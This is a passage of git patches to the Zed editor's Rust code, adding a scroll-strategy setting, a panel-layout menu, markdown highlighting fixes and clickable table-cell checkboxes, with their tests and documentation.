go_to_definition_fallback: Option, + /// How to scroll the target into view when navigating to a definition or reference + /// (e.g. Go to Definition, Go to Type Definition, Find All References). + /// + /// Default: center + pub go_to_definition_scroll_strategy: Option, + /// Jupyter REPL settings. pub jupyter: Option, @@ -799,6 +805,34 @@ pub enum GoToDefinitionFallback { FindAllReferences, } +/// How to scroll the target into view when navigating to a definition or reference. +/// +/// Default: center +#[derive( + Copy, + Clone, + Debug, + Default, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum GoToDefinitionScrollStrategy { + /// Vertically center the target in the viewport. + #[default] + Center, + /// Scroll the minimum amount needed to make the target visible. + Minimum, + /// Scroll so the target appears near the top of the viewport. + Top, +} + /// Determines when the mouse cursor should be hidden in an editor or input box. 
/// /// Default: on_typing_and_movement diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 8a27197f7f0b7c..5b43d0a18426bd 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -9106,7 +9106,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { /// LanguageSettings items that should be included in the "Languages & Tools" page /// not the "Editor" page fn non_editor_language_settings_data() -> Box<[SettingsPageItem]> { - fn lsp_section() -> [SettingsPageItem; 8] { + fn lsp_section() -> [SettingsPageItem; 9] { [ SettingsPageItem::SectionHeader("LSP"), SettingsPageItem::SettingItem(SettingItem { @@ -9188,6 +9188,24 @@ fn non_editor_language_settings_data() -> Box<[SettingsPageItem]> { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Go To Definition Scroll Strategy", + description: "How to scroll the target into view when navigating to a definition or reference.", + field: Box::new(SettingField { + json_path: Some("go_to_definition_scroll_strategy"), + pick: |settings_content| { + settings_content + .editor + .go_to_definition_scroll_strategy + .as_ref() + }, + write: |settings_content, value, _| { + settings_content.editor.go_to_definition_scroll_strategy = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Semantic Tokens", description: { diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index d6696cc7033df5..a718e1277efca6 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -483,6 +483,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) 
diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index e96dfe0655d9fa..c6c33b8b5edd0d 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -2424,6 +2424,38 @@ Example: } ``` +## Go to Definition Scroll Strategy + +- Description: How to scroll the target into view when navigating to a definition or reference (e.g. {#action editor::GoToDefinition}, {#action editor::GoToTypeDefinition}, {#action editor::FindAllReferences}). +- Setting: `go_to_definition_scroll_strategy` +- Default: `"center"` + +**Options** + +1. Vertically center the target in the viewport (default): + +```json [settings] +{ + "go_to_definition_scroll_strategy": "center" +} +``` + +2. Scroll the minimum amount needed to make the target visible: + +```json [settings] +{ + "go_to_definition_scroll_strategy": "minimum" +} +``` + +3. Scroll so the target appears near the top of the viewport: + +```json [settings] +{ + "go_to_definition_scroll_strategy": "top" +} +``` + ## Hard Tabs - Description: Whether to indent lines using tab characters or multiple spaces. From 2660a1e32e7fb23525b2d83905bbd8718225180d Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:15 -0300 Subject: [PATCH 013/231] title_bar: Add "panel layout" menu to the user menu (#54771) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes https://github.com/zed-industries/zed/issues/54545 With the release of the parallel agents feature, we changed the default panel positions optimizing for an agentic-first layout. Even though we introduced a settings backfill _and_ the ability to revert after interacting with the announcement toast, this change seems to be causing a bit of frustration still. In response, this PR adds a "Panel Layout" menu in the user menu that allows to quickly toggle between the "Classic" layout and the "Agentic" layout. 
If you have a different setup, you'll see a "custom" item there just confirming that. | Panel Layout | Custom setup | |--------|--------| | Screenshot 2026-04-24 at 12
52@2x | Screenshot 2026-04-24 at 12 
55@2x | Release Notes: - Added a menu item in the user menu called "Panel Layout" which offers the ability to quickly swap between the two standard panel layouts: classic (project panel, git panel, etc., on the left) and agentic (agent panel on the left, everything else on the right). --- Cargo.lock | 2 ++ crates/title_bar/Cargo.toml | 2 ++ crates/title_bar/src/title_bar.rs | 52 +++++++++++++++++++++++++++++-- 3 files changed, 54 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0c029906834738..5ae684b0a5c336 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -18163,6 +18163,7 @@ checksum = "1f3ccbac311fea05f86f61904b462b55fb3df8837a366dfc601a0161d0532f20" name = "title_bar" version = "0.1.0" dependencies = [ + "agent_settings", "anyhow", "arrayvec", "auto_update", @@ -18172,6 +18173,7 @@ dependencies = [ "client", "cloud_api_types", "db", + "fs", "git_ui", "gpui", "icons", diff --git a/crates/title_bar/Cargo.toml b/crates/title_bar/Cargo.toml index ed7b64c3c18f3c..f4850fe5c8adcd 100644 --- a/crates/title_bar/Cargo.toml +++ b/crates/title_bar/Cargo.toml @@ -29,8 +29,10 @@ test-support = [ ] [dependencies] +agent_settings.workspace = true anyhow.workspace = true auto_update.workspace = true +fs.workspace = true platform_title_bar.workspace = true call.workspace = true channel.workspace = true diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 8edfca67349618..988c8a7c6f492e 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -7,6 +7,7 @@ mod update_version; use crate::application_menu::{ApplicationMenu, show_menus}; use crate::plan_chip::PlanChip; +use agent_settings::{AgentSettings, WindowLayout}; use arrayvec::ArrayVec; use git_ui::worktree_picker::WorktreePicker; pub use platform_title_bar::{ @@ -44,8 +45,8 @@ use std::time::Duration; use theme::ActiveTheme; use title_bar_settings::TitleBarSettings; use ui::{ - Avatar, ButtonLike, ContextMenu, IconWithIndicator, Indicator, 
PopoverMenu, PopoverMenuHandle, - TintColor, Tooltip, prelude::*, utils::platform_title_bar_height, + Avatar, ButtonLike, ContextMenu, ContextMenuEntry, IconWithIndicator, Indicator, PopoverMenu, + PopoverMenuHandle, TintColor, Tooltip, prelude::*, utils::platform_title_bar_height, }; use update_version::UpdateVersion; use util::ResultExt; @@ -1202,6 +1203,13 @@ impl TitleBar { let organizations = organizations.clone(); let user_store = user_store.clone(); + let ai_enabled = !project::DisableAiSettings::get_global(cx).disable_ai; + let current_layout = AgentSettings::get_layout(cx); + let is_editor = matches!(current_layout, WindowLayout::Editor(_)); + let is_agent = matches!(current_layout, WindowLayout::Agent(_)); + let is_custom = matches!(current_layout, WindowLayout::Custom(_)); + let fs = ::global(cx); + ContextMenu::build(window, cx, |menu, _, _cx| { menu.when(is_signed_in, |this| { let user_login = user_login.clone(); @@ -1311,6 +1319,46 @@ impl TitleBar { "Extensions", zed_actions::Extensions::default().boxed_clone(), ) + .when(ai_enabled, |menu| { + let fs = fs.clone(); + menu.separator() + .submenu("Panel Layout", move |menu, _window, _cx| { + let fs = fs.clone(); + menu.toggleable_entry( + "Classic", + is_editor, + IconPosition::Start, + None, + { + let fs = fs.clone(); + move |_window, cx| { + drop(AgentSettings::set_layout( + WindowLayout::Editor(None), + fs.clone(), + cx, + )); + } + }, + ) + .toggleable_entry("Agentic", is_agent, IconPosition::Start, None, { + let fs = fs.clone(); + move |_window, cx| { + drop(AgentSettings::set_layout( + WindowLayout::Agent(None), + fs.clone(), + cx, + )); + } + }) + .when(is_custom, |menu| { + menu.item( + ContextMenuEntry::new("Custom") + .toggleable(IconPosition::Start, true) + .disabled(true), + ) + }) + }) + }) .when(is_signed_in, |this| { this.separator() .action("Sign Out", client::SignOut.boxed_clone()) From 8925d1285188fb21705063ec549353f9795888c8 Mon Sep 17 00:00:00 2001 From: Danilo Leal 
<67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:29 -0300 Subject: [PATCH 014/231] agent_ui: Fix markdown heading sizes (#54766) Follow up to https://github.com/zed-industries/zed/pull/54374 as that removed the custom heading styles that were mostly tailored to the agent panel. It makes sense for those values not to be the ones used for general markdown rendering, but I think it's just too big for the agent panel. So I'm sort of hijacking the `MarkdownFont::Agent` enum here so that we can set it conditionally to just the agent context. Release Notes: - N/A --- crates/markdown/src/markdown.rs | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index fce79630c8d438..e6c046645ce9ff 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -265,6 +265,34 @@ impl MarkdownStyle { }), ..Default::default() }, + heading_level_styles: matches!(font, MarkdownFont::Agent).then_some( + HeadingLevelStyles { + h1: Some(TextStyleRefinement { + font_size: Some(rems(1.15).into()), + ..Default::default() + }), + h2: Some(TextStyleRefinement { + font_size: Some(rems(1.1).into()), + ..Default::default() + }), + h3: Some(TextStyleRefinement { + font_size: Some(rems(1.05).into()), + ..Default::default() + }), + h4: Some(TextStyleRefinement { + font_size: Some(rems(1.).into()), + ..Default::default() + }), + h5: Some(TextStyleRefinement { + font_size: Some(rems(0.95).into()), + ..Default::default() + }), + h6: Some(TextStyleRefinement { + font_size: Some(rems(0.875).into()), + ..Default::default() + }), + }, + ), ..Default::default() } } From ac7c76b4773629a0d151093a6bd226a974549086 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:36 -0300 Subject: [PATCH 015/231] ui: Improve submenu rendering when there's not enough space (#54773) This PR makes the submenu render on the 
left of the trigger if there's not enough space (200px of available width) on the right. This improves the rendering overall, I believe, as it's better than the submenu rendering _on top_ of the parent menu. Release Notes: - N/A --- crates/ui/src/components/context_menu.rs | 47 +++++++++++++++++++----- 1 file changed, 37 insertions(+), 10 deletions(-) diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index c82b05a98a3493..c8f330526df4d1 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -26,6 +26,7 @@ struct OpenSubmenu { entity: Entity, trigger_bounds: Option>, offset: Option, + flip_left: bool, _dismiss_subscription: Subscription, } @@ -1301,6 +1302,11 @@ impl ContextMenu { let (submenu, dismiss_subscription) = Self::create_submenu(builder, cx.entity(), window, cx); + let flip_left = self + .main_menu_observed_bounds + .get() + .is_some_and(|bounds| bounds.right() + px(200.0) > window.viewport_size().width); + // If we're switching from one submenu item to another, throw away any previously-captured // offset so we don't reuse a stale position. 
self.main_menu_observed_bounds.set(None); @@ -1322,6 +1328,7 @@ impl ContextMenu { entity: submenu, trigger_bounds, offset: None, + flip_left, _dismiss_subscription: dismiss_subscription, }); @@ -1665,6 +1672,7 @@ impl ContextMenu { ix: usize, submenu: Entity, offset: Pixels, + flip_left: bool, cx: &mut Context, ) -> impl IntoElement { let bounds_cell = self.main_menu_observed_bounds.clone(); @@ -1684,9 +1692,9 @@ impl ContextMenu { div() .id(("submenu-container", ix)) .absolute() - .left_full() - .ml_neg_0p5() .top(offset) + .when(flip_left, |this| this.right_full().mr_neg_0p5()) + .when(!flip_left, |this| this.left_full().ml_neg_0p5()) .on_hover(cx.listener(|this, hovered, _, _| { if *hovered { this.hover_target = HoverTarget::Submenu; @@ -1694,7 +1702,11 @@ impl ContextMenu { })) .child( anchored() - .anchor(Anchor::TopLeft) + .anchor(if flip_left { + Anchor::TopRight + } else { + Anchor::TopLeft + }) .snap_to_window_with_margin(px(8.0)) .child( div() @@ -2093,7 +2105,12 @@ impl Render for ContextMenu { } focus_submenu = Some(open_submenu.entity.read(cx).focus_handle.clone()); - Some((open_submenu.item_index, open_submenu.entity.clone(), offset)) + Some(( + open_submenu.item_index, + open_submenu.entity.clone(), + offset, + open_submenu.flip_left, + )) } else { None } @@ -2262,9 +2279,14 @@ impl Render for ContextMenu { .child(render_aside(aside, cx)) })) }) - .when_some(submenu_container, |this, (ix, submenu, offset)| { - this.child(self.render_submenu_container(ix, submenu, offset, cx)) - }) + .when_some( + submenu_container, + |this, (ix, submenu, offset, flip_left)| { + this.child( + self.render_submenu_container(ix, submenu, offset, flip_left, cx), + ) + }, + ) } else { v_flex() .w_full() @@ -2273,9 +2295,14 @@ impl Render for ContextMenu { .justify_end() .children(aside.map(|(_, aside)| render_aside(aside, cx))) .child(render_menu(cx, window)) - .when_some(submenu_container, |this, (ix, submenu, offset)| { - this.child(self.render_submenu_container(ix, 
submenu, offset, cx)) - }) + .when_some( + submenu_container, + |this, (ix, submenu, offset, flip_left)| { + this.child( + self.render_submenu_container(ix, submenu, offset, flip_left, cx), + ) + }, + ) } } } From 4e882cdd3a95c45e1688f45e40f17fd75b182119 Mon Sep 17 00:00:00 2001 From: Tim Vermeulen Date: Fri, 24 Apr 2026 14:51:52 +0200 Subject: [PATCH 016/231] markdown: Make highlighting of rendered markdown more accurate (#54744) Paints selections and search highlights of rendered markdown more accurately, to properly match what's actually being selected. Particularly noticeable when the selection spans multiple rows in a table cell or when it starts right after a soft wrap. |Before|After| | --- | --- | |before | after | Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed selection and search highlights in rendered markdown not always being displayed accurately. 
--- crates/markdown/src/markdown.rs | 199 +++++++++++++++++++++----------- 1 file changed, 129 insertions(+), 70 deletions(-) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index e6c046645ce9ff..c7f11ebb68d04d 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -1288,82 +1288,27 @@ impl MarkdownElement { } fn paint_highlight_range( - bounds: Bounds, start: usize, end: usize, color: Hsla, rendered_text: &RenderedText, window: &mut Window, ) { - let start_pos = rendered_text.position_for_source_index(start); - let end_pos = rendered_text.position_for_source_index(end); - if let Some(((start_position, start_line_height), (end_position, end_line_height))) = - start_pos.zip(end_pos) - { - if start_position.y == end_position.y { - window.paint_quad(quad( - Bounds::from_corners( - start_position, - point(end_position.x, end_position.y + end_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } else { - window.paint_quad(quad( - Bounds::from_corners( - start_position, - point(bounds.right(), start_position.y + start_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - - if end_position.y > start_position.y + start_line_height { - window.paint_quad(quad( - Bounds::from_corners( - point(bounds.left(), start_position.y + start_line_height), - point(bounds.right(), end_position.y), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } - - window.paint_quad(quad( - Bounds::from_corners( - point(bounds.left(), end_position.y), - point(end_position.x, end_position.y + end_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } + for bounds in rendered_text.bounds_for_source_range(start..end) { + window.paint_quad(quad( + bounds, + 
Pixels::ZERO, + color, + Edges::default(), + Hsla::transparent_black(), + BorderStyle::default(), + )); } } - fn paint_selection( - &self, - bounds: Bounds, - rendered_text: &RenderedText, - window: &mut Window, - cx: &mut App, - ) { + fn paint_selection(&self, rendered_text: &RenderedText, window: &mut Window, cx: &mut App) { let selection = self.markdown.read(cx).selection.clone(); Self::paint_highlight_range( - bounds, selection.start, selection.end, self.style.selection_background_color, @@ -1374,7 +1319,6 @@ impl MarkdownElement { fn paint_search_highlights( &self, - bounds: Bounds, rendered_text: &RenderedText, window: &mut Window, cx: &mut App, @@ -1390,7 +1334,6 @@ impl MarkdownElement { colors.search_match_background }; Self::paint_highlight_range( - bounds, highlight_range.start, highlight_range.end, color, @@ -2268,7 +2211,7 @@ impl Element for MarkdownElement { &mut self, _id: Option<&GlobalElementId>, _inspector_id: Option<&gpui::InspectorElementId>, - bounds: Bounds, + _bounds: Bounds, rendered_markdown: &mut Self::RequestLayoutState, hitbox: &mut Self::PrepaintState, window: &mut Window, @@ -2298,8 +2241,8 @@ impl Element for MarkdownElement { self.paint_mouse_listeners(hitbox, &rendered_markdown.text, window, cx); rendered_markdown.element.paint(window, cx); - self.paint_search_highlights(bounds, &rendered_markdown.text, window, cx); - self.paint_selection(bounds, &rendered_markdown.text, window, cx); + self.paint_search_highlights(&rendered_markdown.text, window, cx); + self.paint_selection(&rendered_markdown.text, window, cx); } } @@ -2917,6 +2860,78 @@ struct RenderedFootnoteRef { } impl RenderedText { + fn bounds_for_source_range(&self, range: Range) -> Vec> { + let mut all_bounds = Vec::new(); + + for line in self.lines.iter() { + let line_source_start = line.source_mappings.first().unwrap().source_index; + if line_source_start >= range.end { + break; + } + if line.source_end <= range.start { + continue; + } + + let layout = &line.layout; + let 
line_bounds = layout.bounds(); + let line_height = layout.line_height(); + + let rendered_start = + line.rendered_index_for_source_index(range.start.max(line_source_start)); + let rendered_end = line.rendered_index_for_source_index(range.end.min(line.source_end)); + + let mut wrapped_line_start = 0; + let mut row_top = line_bounds.top(); + + while wrapped_line_start < rendered_end { + let Some(wrapped_line) = layout.line_layout_for_index(wrapped_line_start) else { + break; + }; + + let unwrapped_layout = &wrapped_line.unwrapped_layout; + let wrapped_line_end = wrapped_line_start + wrapped_line.len(); + + let row_ends = wrapped_line + .wrap_boundaries() + .iter() + .map(|wrap_boundary| { + let glyph = &unwrapped_layout.runs[wrap_boundary.run_ix].glyphs + [wrap_boundary.glyph_ix]; + (wrapped_line_start + glyph.index, glyph.position.x) + }) + .chain([(wrapped_line_end, unwrapped_layout.width)]); + + let mut row_start = wrapped_line_start; + let mut row_start_x = Pixels::ZERO; + + for (row_end, row_end_x) in row_ends { + let selection_start = rendered_start.max(row_start); + let selection_end = rendered_end.min(row_end); + + if selection_start < selection_end { + let x_for_index = |index| { + line_bounds.left() + + unwrapped_layout.x_for_index(index - wrapped_line_start) + - row_start_x + }; + all_bounds.push(Bounds::from_corners( + point(x_for_index(selection_start), row_top), + point(x_for_index(selection_end), row_top + line_height), + )); + } + + row_start = row_end; + row_start_x = row_end_x; + row_top += line_height; + } + + wrapped_line_start = wrapped_line_end + 1; + } + } + + all_bounds + } + fn source_index_for_position(&self, position: Point) -> Result { let mut lines = self.lines.iter().peekable(); let mut fallback_line: Option<&RenderedLine> = None; @@ -3744,6 +3759,50 @@ mod tests { } } + #[gpui::test] + fn test_bounds_for_source_range_skips_gaps_between_rendered_lines(cx: &mut TestAppContext) { + let source = "First\n\nSecond"; + let rendered = 
render_markdown(source, cx); + let highlight_bounds = rendered.bounds_for_source_range(0..source.len()); + assert_eq!(highlight_bounds.len(), rendered.lines.len()); + + for (line, highlight_bounds) in rendered.lines.iter().zip(highlight_bounds.iter()) { + let line_bounds = line.layout.bounds(); + assert_eq!(highlight_bounds.top(), line_bounds.top()); + assert_eq!( + highlight_bounds.bottom(), + line_bounds.top() + line.layout.line_height() + ); + } + } + + #[gpui::test] + fn test_bounds_for_source_range_returns_one_bound_per_soft_wrap_row(cx: &mut TestAppContext) { + let sentence = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, \ + sed do eiusmod tempor incididunt ut labore et dolore magna aliqua."; + let source = [sentence, sentence, sentence, sentence].join(" "); + let rendered = render_markdown(&source, cx); + let line = &rendered.lines[0]; + let line_bounds = line.layout.bounds(); + let line_height = line.layout.line_height(); + let wrapped_line = line.layout.line_layout_for_index(0).unwrap(); + let visual_row_count = wrapped_line.wrap_boundaries().len() + 1; + + let highlight_bounds = rendered.bounds_for_source_range(0..source.len()); + assert_eq!(highlight_bounds.len(), visual_row_count); + + let mut row_top = line_bounds.top(); + for (row_index, row_bounds) in highlight_bounds.iter().enumerate() { + assert_eq!(row_bounds.top(), row_top); + assert_eq!(row_bounds.bottom(), row_top + line_height); + assert!( + row_bounds.size.width > Pixels::ZERO, + "row {row_index} should have a non-empty highlight" + ); + row_top += line_height; + } + } + #[gpui::test] fn test_heading_font_sizes_are_distinct(cx: &mut TestAppContext) { let rendered = render_markdown("# H1\n\n## H2\n\n### H3\n\nBody text", cx); From e615d14b70699245e88751af867454178f7371b4 Mon Sep 17 00:00:00 2001 From: iam-liam <117163129+iam-liam@users.noreply.github.com> Date: Fri, 24 Apr 2026 14:02:06 +0100 Subject: [PATCH 017/231] markdown: Make table cell checkboxes clickable (#54747) 
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes #53587 Follow-up to #50595. [#50595](https://github.com/zed-industries/zed/pull/50595) added display-only checkboxes when `[x]` / `[X]` / `[ ]` appears as the sole content of a markdown table cell. That PR called out interactivity as a later step — this PR delivers it. https://github.com/user-attachments/assets/c666ee4c-7e31-4450-ab33-c07c82949818 ## What this does When a consumer of `MarkdownElement` supplies an `on_checkbox_toggle` callback, table-cell checkboxes now invoke it on click with the source range of the `[x]` / `[ ]` marker and the new checked state. This mirrors the existing list-item checkbox path. For markdown preview (`markdown_preview_view.rs`) the callback is already wired to edit the source buffer, so clicking a checkbox in a previewed `.md` file now flips `[x]` to `[ ]` and back in the file, the same as it already did for list checkboxes. ## How it works `replace_pending_checkbox` previously took the cell's outer source range and always built a visualization-only checkbox. It now takes the optional toggle callback instead, and reconstructs the marker's exact source range from `pending_line.source_mappings` — pulldown-cmark emits `[x]` in a table cell as three separate `Text` events, so the per-chunk mappings are needed to recover the 3-character range to rewrite. If a callback was supplied, the checkbox attaches an `on_click` that invokes it with that range and `!checked`; otherwise it falls back to the prior visualization-only rendering. Two free helpers (`source_range_for_rendered` / `source_index_for_rendered`) were extracted so the mapping logic is unit-testable. ## Scope One file: `crates/markdown/src/markdown.rs`. No changes to `markdown_preview` — since #52008 it renders through the shared `MarkdownElement`, so its existing `on_checkbox_toggle` wiring picks up table checkboxes for free. 
## Relation to #53587 [#53587](https://github.com/zed-industries/zed/issues/53587) reports that markdown checkboxes in the **agent panel** can't be clicked. This PR is a necessary piece of that fix — without it, even if the agent panel wired `on_checkbox_toggle`, its table checkboxes would stay inert. It does not fully close #53587 on its own: the agent panel's `MarkdownElement` instances in `conversation_view.rs` / `thread_view.rs` don't currently wire `on_checkbox_toggle`, and wiring it there requires deciding how clicks should mutate the in-memory agent response (no source file to edit into). That's a follow-up. ## Test plan **Unit tests** (2 new, both in `crates/markdown/src/markdown.rs`): - `test_table_checkbox_marker_source_range` — walks parser events for a table with checkboxes, replays what the builder accumulates, and asserts the reconstructed source range slices to exactly `[x]` / `[ ]` in the original markdown (including a padded-whitespace case). - `test_source_range_for_rendered_handles_split_chunks` — pins the mapping helper against the three-chunk layout pulldown-cmark produces. 
**Automated**: - [x] `cargo test -p markdown` — 46 tests pass (44 existing + 2 new) - [x] `cargo test -p markdown_preview` — 3 tests pass - [x] `./script/clippy -p markdown` — clean **Manual** (against a preview of a markdown file with checkbox tables): - [x] Click a checked `[x]` table cell — it becomes `[ ]` in the source and rerenders as unchecked - [x] Click an unchecked `[ ]` — becomes `[x]` - [x] Uppercase `[X]` toggles on click (replacement writes `[x]` / `[ ]`, matching the list-item behaviour) - [x] Padded-whitespace cells still target just the three marker characters - [x] Multiple checkbox columns in one table all independently clickable - [x] Alignment variants (left/center/right) behave the same - [x] Non-checkbox table text unaffected - [x] List-item checkboxes continue to work (regression) Release Notes: - Made table-cell markdown checkboxes clickable in markdown preview, matching list-item checkbox behavior Co-authored-by: Lukas Wirth --- crates/markdown/src/markdown.rs | 168 ++++++++++++++++++++++++++++---- 1 file changed, 148 insertions(+), 20 deletions(-) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index c7f11ebb68d04d..2fd0eb692d0c55 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -2102,7 +2102,7 @@ impl Element for MarkdownElement { builder.table.end_row(); } MarkdownTagEnd::TableCell => { - builder.replace_pending_checkbox(range); + builder.replace_pending_checkbox(self.on_checkbox_toggle.clone()); builder.pop_div(); builder.table.end_cell(); } @@ -2660,26 +2660,53 @@ impl MarkdownElementBuilder { } } - fn replace_pending_checkbox(&mut self, source_range: &Range) { - let trimmed = self.pending_line.text.trim(); - if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { - let checked = trimmed != "[ ]"; - self.pending_line = PendingLine::default(); - let checkbox = Checkbox::new( - ElementId::Name( - format!("table_checkbox_{}_{}", source_range.start, 
source_range.end).into(), - ), - if checked { - ToggleState::Selected - } else { - ToggleState::Unselected - }, - ) - .fill() - .visualization_only(true) - .into_any_element(); - self.div_stack.last_mut().unwrap().extend([checkbox]); + fn replace_pending_checkbox(&mut self, on_toggle: Option) { + let text = &self.pending_line.text; + let trimmed = text.trim(); + if trimmed != "[x]" && trimmed != "[X]" && trimmed != "[ ]" { + return; } + let checked = trimmed != "[ ]"; + + let leading_ws = text.len() - text.trim_start().len(); + let marker_rendered = leading_ws..leading_ws + trimmed.len(); + let marker_source = self + .source_range_for_rendered(&marker_rendered) + .expect("pending checkbox text must have source mappings"); + + self.pending_line = PendingLine::default(); + + let toggle_state = if checked { + ToggleState::Selected + } else { + ToggleState::Unselected + }; + let checkbox = Checkbox::new( + ElementId::Name( + format!( + "table_checkbox_{}_{}", + marker_source.start, marker_source.end + ) + .into(), + ), + toggle_state, + ) + .fill(); + + let element = if let Some(on_toggle) = on_toggle { + checkbox + .on_click(move |_state, window, cx| { + on_toggle(marker_source.clone(), !checked, window, cx); + }) + .into_any_element() + } else { + checkbox.visualization_only(true).into_any_element() + }; + self.div_stack.last_mut().unwrap().extend([element]); + } + + fn source_range_for_rendered(&self, rendered: &Range) -> Option> { + source_range_for_rendered(&self.pending_line.source_mappings, rendered) } fn render_source_anchor(&mut self, source_range: Range) -> AnyElement { @@ -2835,6 +2862,30 @@ struct SourceMapping { source_index: usize, } +fn source_range_for_rendered( + mappings: &[SourceMapping], + rendered: &Range, +) -> Option> { + if rendered.start >= rendered.end { + return None; + } + let start = source_index_for_rendered(mappings, rendered.start)?; + let end = source_index_for_rendered(mappings, rendered.end - 1)? 
+ 1; + Some(start..end) +} + +fn source_index_for_rendered(mappings: &[SourceMapping], rendered_index: usize) -> Option { + let mut last: Option<&SourceMapping> = None; + for mapping in mappings { + if mapping.rendered_index <= rendered_index { + last = Some(mapping); + } else { + break; + } + } + last.map(|m| m.source_index + (rendered_index - m.rendered_index)) +} + pub struct RenderedMarkdown { element: AnyElement, text: RenderedText, @@ -3414,6 +3465,83 @@ mod tests { assert_eq!(checkbox_cells[1].trim(), "[ ]"); } + #[test] + fn test_table_checkbox_marker_source_range() { + let md = "| Done |\n|------|\n| [x] |\n| [ ] |"; + let events = crate::parser::parse_markdown_with_options(md, false, false).events; + + let mut in_cell = false; + let mut pending_text = String::new(); + let mut mappings: Vec = Vec::new(); + let mut cell_ranges: Vec> = Vec::new(); + + for (range, event) in &events { + match event { + MarkdownEvent::Start(MarkdownTag::TableCell) => { + in_cell = true; + pending_text.clear(); + mappings.clear(); + } + MarkdownEvent::End(MarkdownTagEnd::TableCell) => { + if in_cell { + let trimmed = pending_text.trim(); + if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { + let leading = pending_text.len() - pending_text.trim_start().len(); + let rendered = leading..leading + trimmed.len(); + let marker_source = source_range_for_rendered(&mappings, &rendered) + .expect("marker source range"); + cell_ranges.push(marker_source); + } + } + in_cell = false; + } + MarkdownEvent::Text if in_cell => { + mappings.push(SourceMapping { + rendered_index: pending_text.len(), + source_index: range.start, + }); + pending_text.push_str(&md[range.clone()]); + } + _ => {} + } + } + + assert_eq!(cell_ranges.len(), 2); + for marker_range in &cell_ranges { + let slice = &md[marker_range.clone()]; + assert!( + slice == "[x]" || slice == "[X]" || slice == "[ ]", + "expected `[x]`/`[X]`/`[ ]`, got {slice:?} at {marker_range:?}" + ); + } + } + + #[test] + fn 
test_source_range_for_rendered_handles_split_chunks() { + let mappings = vec![ + SourceMapping { + rendered_index: 0, + source_index: 20, + }, + SourceMapping { + rendered_index: 1, + source_index: 21, + }, + SourceMapping { + rendered_index: 2, + source_index: 22, + }, + ]; + + let range = source_range_for_rendered(&mappings, &(0..3)).unwrap(); + assert_eq!(range, 20..23); + + let range = source_range_for_rendered(&mappings, &(1..2)).unwrap(); + assert_eq!(range, 21..22); + + assert_eq!(source_range_for_rendered(&mappings, &(2..2)), None); + } + #[gpui::test] fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) { // Test that double-clicking on inline code selects just the code content, From 57d7632b28f0303be546357fc6808bda242d1049 Mon Sep 17 00:00:00 2001 From: Kunall Banerjee Date: Fri, 24 Apr 2026 09:54:28 -0400 Subject: [PATCH 018/231] agent_ui: Allow selection of commands from tool calls (#50545) Closes #50427. Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) The changes respect your current theme + mimic the existing UI when it 